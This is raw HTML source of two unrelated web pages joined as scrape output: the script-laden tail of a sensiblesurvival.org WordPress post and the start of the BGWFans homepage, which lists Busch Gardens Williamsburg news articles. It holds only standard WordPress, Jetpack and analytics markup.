href=\"https:\/\/wordpress.com\/log-in?redirect_to=https%3A%2F%2Fsensiblesurvival.org%2F2018%2F08%2F24%2F13-things-youll-wish-you-had-when-your-smart-phone-is-useless%2F&signup_flow=account&domain=sensiblesurvival.org\">Log in now.<\/a>","stats":"Stats"}}; /* ]]> */ </script> <script type='text/javascript'> /* <![CDATA[ */ var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"https:\/\/sensiblesurvival.org\/wp-admin\/admin-ajax.php","nonce":"20067da137","display_exif":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"0","require_name_email":"1","login_url":"https:\/\/sensiblesurvival.wordpress.com\/wp-login.php?redirect_to=https%3A%2F%2Fsensiblesurvival.org%2F2018%2F07%2F26%2Fmake-dutch-oven-biscuits%2F","blog_id":"29864982","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">Email (Required)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Name (Required)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Website<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>","reblog":"Reblog","reblogged":"Reblogged","reblog_add_thoughts":"Add your thoughts here... (optional)","reblogging":"Reblogging...","post_reblog":"Post Reblog","stats_query_args":"blog=29864982&v=wpcom&tz=-5&user_id=0&subd=sensiblesurvival","is_public":"1","reblog_enabled":""}; /* ]]> */ </script> <script type='text/javascript' src='https://s1.wp.com/_static/??-eJyVUNEOwjAI/CErajT6YvyW2qFSO1oL3fTv7Uy2GB+W+HbA3XEAfTIusiIreIEGO3KYnksvC/gatcWkUK7EAoHuKPAoWPBmuQmYZ8jEF2LS1wRmuLZpic3ZZmitKOaKTOwwZ2rqwqn3p4Nm6+4yJ3JKkQfRhGbYzuZYBAN41FSdzdgYNcQulCFw/ab0l3j26PTXcHTr6mkRrAjqR/CpU0YZAp/a43q322/Xh8Nq499P3Z/I'></script> <script type='text/javascript' src='https://platform.twitter.com/widgets.js?ver=20111117'></script> <script type='text/javascript' src='https://s0.wp.com/_static/??-eJyVy0sOQEAMANALqcZnluIsmGbSUTUZRdyerZVYvsXDM8G0qpEaLjsk2QPrhnayGWUYZZjmkbOHxIRKB2VSzxrKuBX456bvx0IewiBC+XrrWf3SVc61deOquo03DQdDyw=='></script> <script type="text/javascript"> // <![CDATA[ (function() { try{ if ( window.external &&'msIsSiteMode' in window.external) { if (window.external.msIsSiteMode()) { var jl = document.createElement('script'); jl.type='text/javascript'; jl.async=true; jl.src='/wp-content/plugins/ie-sitemode/custom-jumplist.php'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(jl, s); } } }catch(e){} })(); // ]]> </script><script type="text/javascript"> jQuery.extend( infiniteScroll.settings.scripts, ["jquery-core","jquery-migrate","jquery","postmessage","mobile-useragent-info","jquery_inview","jetpack_resize","spin","jquery.spin","grofiles-cards","wpgroho","jquery.autoresize","highlander-comments","devicepx","jetpack_likes_queuehandler","the-neverending-homepage","wpcom-masterbar-js","wpcom-masterbar-tracks-js","wpcom-actionbar-bar","jetpack-carousel","swfobject","videopress","twitter-widgets","twitter-widgets-infinity","twitter-widgets-pending","tiled-gallery"] ); jQuery.extend( infiniteScroll.settings.styles, ["wpcom-smileys","jetpack_likes","the-neverending-homepage","wp-block-library","wpcom-core-compat-playlist-styles","mp6hacks","wpcom-bbpress2-staff-css","titan","titan-wpcom","noticons","geo-location-flair","reblogging","a8c-global-print","wpcom-actionbar-bar","h4-global","highlander-comments","highlander-comments-ie7","jetpack-carousel","tiled-gallery"] ); </script><script src="//stats.wp.com/w.js?60" type="text/javascript" async defer></script> <script type="text/javascript"> _tkq = window._tkq || []; _stq = window._stq || []; _tkq.push(['storeContext', {'blog_id':'29864982','blog_tz':'-5','user_lang':'en','blog_lang':'en','user_id':'0'}]); _stq.push(['view', {'blog':'29864982','v':'wpcom','tz':'-5','user_id':'0','subd':'sensiblesurvival'}]); _stq.push(['extra', {'crypt':'UE40eW5QN0p8M2Y/RE1TaVhzUzFMbjdWNHpwZGhTayxPSUFCMGRVYVNrSFguN3FwSmQ5RGtNX3VQcj1yVzhiflM1THQtLGFdQ2toOXYlQlRKOTEvQzdTQXFyckRPVDVNWEMwZlBaZltvS2lCKyZTXUloJjk9L3xLblJQTW81fnIsaGlHYWxmbGExX2olLV0wTnNrL2tCNjVqV0VCNnRndGVKVEozMHFTb0k0UVJXQjZGMXVJTl98SmRzNCt5X2JnYjZwa2E3b3dSNltCSGRWRDBSLUg/dUptVlByckszeGxqNURRMm1UdF8mTWt4eXxpSixl'}]); _stq.push([ 'clickTrackerInit', '29864982', '0' ]); </script> <noscript><img src="https://pixel.wp.com/b.gif?v=noscript" style="height:0px;width:0px;overflow:hidden" alt="" /></noscript> <script> if ( 'object' === typeof wpcom_mobile_user_agent_info ) { wpcom_mobile_user_agent_info.init(); var mobileStatsQueryString = ""; if( false !== wpcom_mobile_user_agent_info.matchedPlatformName ) mobileStatsQueryString += "&x_" + 'mobile_platforms' + '=' + wpcom_mobile_user_agent_info.matchedPlatformName; if( false !== wpcom_mobile_user_agent_info.matchedUserAgentName ) mobileStatsQueryString += "&x_" + 'mobile_devices' + '=' + wpcom_mobile_user_agent_info.matchedUserAgentName; if( wpcom_mobile_user_agent_info.isIPad() ) mobileStatsQueryString += "&x_" + 'ipad_views' + '=' + 'views'; if( "" != mobileStatsQueryString ) { new Image().src = document.location.protocol + '//pixel.wp.com/g.gif?v=wpcom-no-pv' + mobileStatsQueryString + '&baba=' + Math.random(); } } </script></body> </html>
0
<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>BGWFans - Busch Gardens Williamsburg News &amp; Rumors by Fans, for Fans</title> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https://bgwfans.com/xmlrpc.php"> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//secure.gravatar.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="BGWFans &raquo; Feed" href="https://bgwfans.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="BGWFans &raquo; Comments Feed" href="https://bgwfans.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/bgwfans.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.10"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <!--[if lte IE 8]> <link rel='stylesheet' id='jetpack-carousel-ie8fix-css' href='https://bgwfans.com/wp-content/plugins/jetpack/modules/carousel/jetpack-carousel-ie8fix.css?ver=20121024' type='text/css' media='all' /> <![endif]--> <link rel='stylesheet' id='_amymag_-google-fonts-css' href='https://fonts.googleapis.com/css?family=Playfair+Display%3A900italic%2C900italic%2C900%7CGentium+Book+Basic%3Aregular%2C400%2C400italic%2C700%2C700italic%7CDomine%3A400%2C700%7CPT+Serif%3A400%2C400italic%2C700%2C700italic%7C&#038;ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='literatum-style-css' href='https://bgwfans.com/wp-content/themes/literatum/css/style.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='literatum-style-reset-css' href='https://bgwfans.com/wp-content/themes/literatum/css/style-reset.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='literatum-style-typography-css' href='https://bgwfans.com/wp-content/themes/literatum/css/style-typography.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='literatum-style-elements-css' href='https://bgwfans.com/wp-content/themes/literatum/css/style-elements.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='literatum-style-forms-css' href='https://bgwfans.com/wp-content/themes/literatum/css/style-forms.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='literatum-style-aligments-css' href='https://bgwfans.com/wp-content/themes/literatum/css/style-aligments.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='literatum-style-links-css' href='https://bgwfans.com/wp-content/themes/literatum/css/style-links.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='literatum-style-clearings-css' href='https://bgwfans.com/wp-content/themes/literatum/css/style-clearings.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='literatum-style-header-css' href='https://bgwfans.com/wp-content/themes/literatum/css/style-header.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='literatum-style-menus-css' href='https://bgwfans.com/wp-content/themes/literatum/css/style-menus.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='literatum-style-cards-css' href='https://bgwfans.com/wp-content/themes/literatum/css/style-cards.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='literatum-style-articles-css' href='https://bgwfans.com/wp-content/themes/literatum/css/style-articles.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='literatum-style-comments-css' href='https://bgwfans.com/wp-content/themes/literatum/css/style-comments.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='literatum-style-pushmenu-css' href='https://bgwfans.com/wp-content/themes/literatum/css/style-pushmenu.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='literatum-style-author-css' href='https://bgwfans.com/wp-content/themes/literatum/css/style-author.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='literatum-style-loops-css' href='https://bgwfans.com/wp-content/themes/literatum/css/style-loops.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='literatum-flexboxgrid-css' href='https://bgwfans.com/wp-content/themes/literatum/css/flexboxgrid.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='literatum-icons-css' href='https://bgwfans.com/wp-content/themes/literatum/css/icons.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='literatum-animate-css' href='https://bgwfans.com/wp-content/themes/literatum/css/animate.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='literatum-nprogress-css' href='https://bgwfans.com/wp-content/themes/literatum/css/nprogress.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='open-sans-css' href='https://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400italic%2C600italic%2C300%2C400%2C600&#038;subset=latin%2Clatin-ext&#038;ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='https://bgwfans.com/wp-content/plugins/jetpack/css/jetpack.css?ver=6.8' type='text/css' media='all' /> <script type='text/javascript' src='https://bgwfans.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://bgwfans.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://bgwfans.com/wp-content/plugins/jetpack/_inc/build/spin.min.js?ver=1.3'></script> <script type='text/javascript' src='https://bgwfans.com/wp-content/plugins/jetpack/_inc/build/jquery.spin.min.js?ver=1.3'></script> <script type='text/javascript' src='https://bgwfans.com/wp-content/plugins/jetpack/_inc/build/tiled-gallery/tiled-gallery/tiled-gallery.min.js?ver=4.9.10'></script> <script type='text/javascript' src='https://bgwfans.com/wp-content/themes/literatum/js/jquery.infinitescroll.min.js?ver=20130115'></script> <script type='text/javascript' src='https://bgwfans.com/wp-content/plugins/jetpack/_inc/build/postmessage.min.js?ver=6.8'></script> <script type='text/javascript' src='https://bgwfans.com/wp-content/plugins/jetpack/_inc/build/jquery.jetpack-resize.min.js?ver=6.8'></script> <link rel='https://api.w.org/' href='https://bgwfans.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://bgwfans.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://bgwfans.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.9.10" /> <link rel='shortlink' href='https://wp.me/C9YX' /> <link rel='dns-prefetch' href='//v0.wordpress.com'/> <link rel='dns-prefetch' href='//i0.wp.com'/> <link rel='dns-prefetch' href='//i1.wp.com'/> <link rel='dns-prefetch' href='//i2.wp.com'/> <link rel='dns-prefetch' href='//jetpack.wordpress.com'/> <link rel='dns-prefetch' href='//s0.wp.com'/> <link rel='dns-prefetch' href='//s1.wp.com'/> <link rel='dns-prefetch' href='//s2.wp.com'/> <link rel='dns-prefetch' href='//public-api.wordpress.com'/> <link rel='dns-prefetch' href='//0.gravatar.com'/> <link rel='dns-prefetch' href='//1.gravatar.com'/> <link rel='dns-prefetch' href='//2.gravatar.com'/> <link rel='dns-prefetch' href='//widgets.wp.com'/> <style type='text/css'>img#wpstats{display:none}</style><style> .article-card.squarebig > .inner .inner .title, #card-nextpost.article-card > .inner .inner .title { font-family:'Playfair Display'; font-weight:900italic; } .article-card.squarebig > .inner .inner .post-subtitle { font-family:'Gentium Book Basic'; font-weight:regular; font-size:22pt; } .article-card > .inner .inner .meta { font-size:13pt; } .article-card.square > .inner .inner .title { font-family:'Playfair Display'; font-weight:900italic; } div.logo .logo-legend { font-family:'Playfair Display'; font-weight:900; } ul.main-menu li a { } article .entry-content a, .entry-footer a { color:#4169e1; } article .entry-content a:hover, .entry-footer a:hover { color:#191970; } article .entry-content { color:#5f5858; } article .entry-content p, .article-default-width { max-width:680px; } .article-card.frontpage-head > .inner .inner .title { } .article-card.frontpage-head > .inner .inner .description { } .article-card.pagehead.frontpage-head { height:50vh; } </style> <style> .scroller.cbp-spmenu-push-toright { /*left: 300px;*/ -webkit-transform: translate3d(-300px,0,0); -moz-transform: translate3d(-300px,0,0); transform: translate3d(-300px,0,0); } </style> <link rel="icon" type="image/png" href="https://bgwfans.com/wp-content/uploads/2018/07/Square.png"> <link rel="icon" href="https://i1.wp.com/bgwfans.com/wp-content/uploads/2018/07/cropped-Square.png?fit=32%2C32&#038;ssl=1" sizes="32x32" /> <link rel="icon" href="https://i1.wp.com/bgwfans.com/wp-content/uploads/2018/07/cropped-Square.png?fit=192%2C192&#038;ssl=1" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://i1.wp.com/bgwfans.com/wp-content/uploads/2018/07/cropped-Square.png?fit=180%2C180&#038;ssl=1" /> <meta name="msapplication-TileImage" content="https://i1.wp.com/bgwfans.com/wp-content/uploads/2018/07/cropped-Square.png?fit=270%2C270&#038;ssl=1" /> <link rel="stylesheet" type="text/css" id="wp-custom-css" href="https://bgwfans.com/?custom-css=049dc9d839" /> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/flickity/2.0.5/flickity.min.css"> <script src="https://cdnjs.cloudflare.com/ajax/libs/flickity/2.0.5/flickity.pkgd.min.js"></script> </head> <body class="home blog wp-custom-logo"> <!--[if IE 9 ]> <div id="page" class="hfeed site ie9"> <![endif]--> <!--[if !IE 9]>--> <div id="page" class="hfeed site"> <!--<![endif]--> <div class="container"> <!-- Push Wrapper --> <div class="mp-pusher " id="mp-pusher"> <!-- /mp-menu --> <nav id="mp-menu" class="mp-menu"> <div class="mp-level"> <div class="quit-menu-button-container"> <span onclick="pushmenu_close()" class="quit-menu-button"><i>&#xe949;</i> Close</span> </div> <div id="sidebar-content"> <div id="search-2" class="widget widget_search"><form role="search" method="get" class="search-form" action="https://bgwfans.com/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" /> </label> <input type="submit" class="search-submit" value="Search" /> </form></div><div id="nav_menu-3" class="widget widget_nav_menu"><div class="menu-navigation-sidebar-menu-container"><ul id="menu-navigation-sidebar-menu" class="menu"><li id="menu-item-10435" class="icon-home menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-10435"><a title="BGWFans Homepage" href="http://bgwfans.com/">Home</a></li> <li id="menu-item-10436" class="icon-chat menu-item menu-item-type-custom menu-item-object-custom menu-item-10436"><a title="The ParkFans Forum" href="https://parkfans.net/">Our Forum</a></li> <li id="menu-item-10629" class="icon-picture menu-item menu-item-type-custom menu-item-object-custom menu-item-10629"><a title="BGWFans&#8217;s Flickr Account" href="https://www.flickr.com/photos/parkfans/collections/72157630141427590/">Our Pictures</a></li> <li id="menu-item-10449" class="icon-email menu-item menu-item-type-post_type menu-item-object-page menu-item-10449"><a title="Contact BGWFans" href="https://bgwfans.com/contact/">Contact Us</a></li> </ul></div></div><div id="nav_menu-5" class="widget widget_nav_menu"><div class="menu-sidebar-post-categories-container"><ul id="menu-sidebar-post-categories" class="menu"><li id="menu-item-10443" class="icon-newspaper menu-item menu-item-type-taxonomy menu-item-object-category menu-item-10443"><a title="News &#038; Rumors About Busch Gardens Williamsburg" href="https://bgwfans.com/category/news/">News</a></li> <li id="menu-item-10444" class="icon-key-1 menu-item menu-item-type-taxonomy menu-item-object-category menu-item-10444"><a title="Busch Gardens Williamsburg Previews &#038; Leaks" href="https://bgwfans.com/category/previews/">Previews</a></li> <li id="menu-item-10445" class="icon-star-half-alt menu-item menu-item-type-taxonomy menu-item-object-category menu-item-10445"><a title="Busch Gardens Williamsburg Attraction, Food, &#038; Event Reviews" href="https://bgwfans.com/category/reviews/">Reviews</a></li> <li id="menu-item-10446" class="icon-search menu-item menu-item-type-taxonomy menu-item-object-category menu-item-10446"><a title="Updates About Busch Gardens Williamsburg Projects" href="https://bgwfans.com/category/updates/">Updates</a></li> </ul></div></div><div id="nav_menu-4" class="widget widget_nav_menu"><div class="menu-sidebar-social-media-menu-container"><ul id="menu-sidebar-social-media-menu" class="menu"><li id="menu-item-10438" class="icon-twitter menu-item menu-item-type-custom menu-item-object-custom menu-item-10438"><a title="BGWFans on Twitter" target="_blank" href="http://twitter.com/BGWFans">Twitter</a></li> <li id="menu-item-10439" class="icon-facebook menu-item menu-item-type-custom menu-item-object-custom menu-item-10439"><a title="BGWFans on Facebook" target="_blank" href="http://facebook.com/BGWFans">Facebook</a></li> <li id="menu-item-10440" class="icon-instagram menu-item menu-item-type-custom menu-item-object-custom menu-item-10440"><a title="BGWFans on Instagram" target="_blank" href="http://instagram.com/BGWFans">Instagram</a></li> <li id="menu-item-10441" class="icon-youtube menu-item menu-item-type-custom menu-item-object-custom menu-item-10441"><a title="BGWFans on YouTube" target="_blank" href="https://www.youtube.com/user/BGWFans">YouTube</a></li> <li id="menu-item-10442" class="icon-gplus menu-item menu-item-type-custom menu-item-object-custom menu-item-10442"><a title="BGWFans on Google+" target="_blank" href="http://plus.google.com/+BGWFans">Google+</a></li> </ul></div></div> </div> <footer id="colophon" class="site-footer" role="contentinfo"> <div class="site-info default-content-width"> <div class="int"> <div class="bottom-menu-container" style="text-align:right"> <div class="menu-sidebar-footer-container"><ul id="menu-sidebar-footer" class="bottom-menu"><li id="menu-item-10641" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10641"><a target="_blank" href="https://bgwfans.com/contact/">Contact BGWFans.com</a></li> </ul></div> </div> <div style="clear:both"></div> </div> </div><!-- .site-info --> </footer><!-- #colophon --> </div> </nav> <div class="scroller "><!-- this is for emulating position fixed of the nav --> <div class="scroller-inner "> <!-- back to top button and menu --> <div id="top-controls"> <span class="top-button" onclick="scrollto('#page', 750, -30)"> <i>&#xe824;</i> </span> <span class="top-button" onclick="pushmenu()"> <i>&#xe944;</i> </div> </div> <div class="push-cover"></div> <header id="masthead" class="site-header " role="banner"> <div class="row start-hand default-content-width"> <div class="column-7-hand head-column-1"> <div class="logo"> <a id="site-logo" href="https://bgwfans.com" class="box"> BGWFans </a> </div> </div> <div class="column-auto-hand primary-menu-container head-column-2" style="text-align:right"> <div class="menu-header-menu-container"><ul id="menu-header-menu" class="main-menu"><li id="menu-item-10433" class="icon-twitter menu-item menu-item-type-custom menu-item-object-custom menu-item-10433"><a title="BGWFans Twitter Page" target="_blank" href="http://twitter.com/BGWFans">Twitter</a></li> <li id="menu-item-10434" class="icon-facebook menu-item menu-item-type-custom menu-item-object-custom menu-item-10434"><a title="BGWFans Facebook Page" target="_blank" href="http://facebook.com/BGWFans">Facebook</a></li> <li id="menu-item-10735" class="icon-chat menu-item menu-item-type-custom menu-item-object-custom menu-item-10735"><a title="ParkFans.net Forum" target="_blank" href="https://ParkFans.net/">Forum</a></li> </ul></div> </div> <div class="column-auto-hand menu-pusher-container head-column-3" style="min-width:80px;text-align:right;"> <div onclick="pushmenu()" class="box menu-pusher"><span class="hide-on-mobileX">Menu</span> <i>&#xe944;</i></div> </div> </div> </header><!-- #masthead --> <div id="content" class="site-content"> <div id="primary" class="content-area" style="min-height:100%"> <div id="main" class="site-main" role="main" style="min-height:100%"> <div style="min-height:100%"><div id="card-12357" class="article-card squarebig under-header "> <div class="inner"> <div class="image-background " style="z-index:0;background-image:url('');"> </div> <div class="image-background image-final hidden" style="z-index:0;background-image:url('');"> </div> <div style="background-color:rgba(0,0,0,0.4);" class="image-cover"> <div class="frame-inner"> <div class="inner"> <div class="on-top-title"> <div class="sharediv"> <script> var lefts = (screen.width/2)-(450/2); var tops = (screen.height/2)-(350/2); </script> <span class="share-item" onclick="window.open('https://twitter.com/share?url=https://bgwfans.com/2019/bgw-project-2021/&amp;text=BGW Project 2021&amp;hashtags=','','toolbar=no, location=no, directories=no, status=no, menubar=no, scrollbars=no, resizable=no, copyhistory=no, width=450,height=350, top='+ tops +', left='+ lefts)"> <i>&#xe908;</i> <span class="hide-on-mobile">Tweet this</span> </span> <span class="share-item" onclick="window.open('https://www.facebook.com/sharer/sharer.php?u=https://bgwfans.com/2019/bgw-project-2021/','','toolbar=no, location=no, directories=no, status=no, menubar=no, scrollbars=no, resizable=no, copyhistory=no, width=450,height=350, top='+ tops +', left='+ lefts)"> <i>&#xe90c;</i> <span class="hide-on-mobile">Share</span> </span> <span class="share-item" onclick="window.open('https://getpocket.com/edit?url=https://bgwfans.com/2019/bgw-project-2021/&amp;title=BGW Project 2021','','toolbar=no, location=no, directories=no, status=no, menubar=no, scrollbars=no, resizable=no, copyhistory=no, width=450,height=350, top='+ tops +', left='+ lefts)"> <i>&#xe8be;</i> <span class="hide-on-mobile">Read later </span> </span> </div> </div> <h1><a href="https://bgwfans.com/2019/bgw-project-2021/" title="BGW Project 2021" class="title ajaxlink">BGW Project 2021</a></h1> <a href="https://bgwfans.com/2019/bgw-project-2021/" title="BGW Project 2021" class="post-subtitle ajaxlink"> A Newly-Filed Height Waiver Suggests Busch Gardens Williamsburg May Have Big Plans Following 2020 </a> <span class="meta"> <span class="date"> April 3, 2019 </span> <span class="author"> By <a class="ajaxlink" href="https://bgwfans.com/author/zachary/">Zachary</a> </span> <span> 2 min read </span> </span> </div> </div> </div> </div> <script> var img = jQuery("<img />").attr('src', '') .load(function() { if (!this.complete || typeof this.naturalWidth == "undefined" || this.naturalWidth == 0) { } else { jQuery('#card-12357 .image-background').animate({opacity: 1}, 540, function() {jQuery('.image-background.thumb').fadeOut()} ); } }); jQuery(function() { // ios viewport height (vh) fix $card = jQuery('#card-12357.article-card.squarebig'); var is_iphone = /(iPhone|iPod)/g.test( navigator.userAgent ); var is_ipad = /(iPad)/g.test( navigator.userAgent ); if(is_iphone) { $card.css("height", 600); $card.find('.image-background').css("height", 600); $card.find('.image-background').css("background-attachment", 'scroll'); }; if(is_ipad) { $card.css("height", 800); //$card.find('.image-background').css("height", 700); $card.find('.image-background').css("background-attachment", 'scroll'); }; }) </script> </div></div> <div class="article-card square double " > <div class="inner"> <div class="image-background" style="background-color:#f1c40f;background-image:url('https://i0.wp.com/bgwfans.com/wp-content/uploads/2019/03/2020-Height-Back.jpg?fit=960%2C720&ssl=1');"> </div> <div class="image-cover" style="background-color:rgba(0,0,0,0.4);"> <div class="inner"> <h3><a href="https://bgwfans.com/2019/solving-for-y-in-mmxx/" title="Solving for Y in MMXX" class="title ajaxlink">Solving for Y in MMXX</a></h3> <span class="meta"> <span class="date"> March 28, 2019 </span> <span class="author"> By <a class="ajaxlink" href="https://bgwfans.com/author/zachary/">Zachary</a> </span> <span> 6 min read </span> </span> </div> </div> </div> </div><div class="article-card square " > <div class="inner"> <div class="image-background" style="background-color:#9b59b6;background-image:url('https://i1.wp.com/bgwfans.com/wp-content/uploads/2019/03/IMG_8983v2.jpg?fit=960%2C540&ssl=1');"> </div> <div class="image-cover" style="background-color:rgba(0,0,0,0.4);"> <div class="inner"> <h3><a href="https://bgwfans.com/2019/too-pretty-to-be-overlooked/" title="Too Pretty to be Overlooked" class="title ajaxlink">Too Pretty to be Overlooked</a></h3> <span class="meta"> <span class="date"> March 14, 2019 </span> <span class="author"> By <a class="ajaxlink" href="https://bgwfans.com/author/nicole/">Nicole</a> </span> <span> 4 min read </span> </span> </div> </div> </div> </div><div class="article-card square " > <div class="inner"> <div class="image-background" style="background-color:#f1c40f;background-image:url('https://i1.wp.com/bgwfans.com/wp-content/uploads/2019/03/Header_Image.png?fit=960%2C612&ssl=1');"> </div> <div class="image-cover" style="background-color:rgba(0,0,0,0.4);"> <div class="inner"> <h3><a href="https://bgwfans.com/2019/project-2020-revealed/" title="Project 2020 Revealed" class="title ajaxlink">Project 2020 Revealed</a></h3> <span class="meta"> <span class="date"> March 13, 2019 </span> <span class="author"> By <a class="ajaxlink" href="https://bgwfans.com/author/zachary/">Zachary</a> </span> <span> 27 min read </span> </span> </div> </div> </div> </div><div class="article-card square " > <div class="inner"> <div class="image-background" style="background-color:#2ecc71;background-image:url('https://i1.wp.com/bgwfans.com/wp-content/uploads/2019/02/Head.jpg?fit=960%2C600&ssl=1');"> </div> <div class="image-cover" style="background-color:rgba(0,0,0,0.4);"> <div class="inner"> <h3><a href="https://bgwfans.com/2019/project-madrid-site-plans/" title="Project Madrid Site Plans" class="title ajaxlink">Project Madrid Site Plans</a></h3> <span class="meta"> <span class="date"> February 8, 2019 </span> <span class="author"> By <a class="ajaxlink" href="https://bgwfans.com/author/zachary/">Zachary</a> </span> <span> 7 min read </span> </span> </div> </div> </div> </div><div class="article-card square " > <div class="inner"> <div class="image-background" style="background-color:#3498db;background-image:url('');"> </div> <div class="image-cover" style="background-color:rgba(0,0,0,0.4);"> <div class="inner"> <h3><a href="https://bgwfans.com/2018/new-membership-program-gets-a-substantial-overhaul/" title="New Membership Program Gets a Substantial Overhaul" class="title ajaxlink">New Membership Program Gets a Substantial Overhaul</a></h3> <span class="meta"> <span class="date"> October 3, 2018 </span> <span class="author"> By <a class="ajaxlink" href="https://bgwfans.com/author/nicole/">Nicole</a> </span> <span> 11 min read </span> </span> </div> </div> </div> </div><div class="article-card 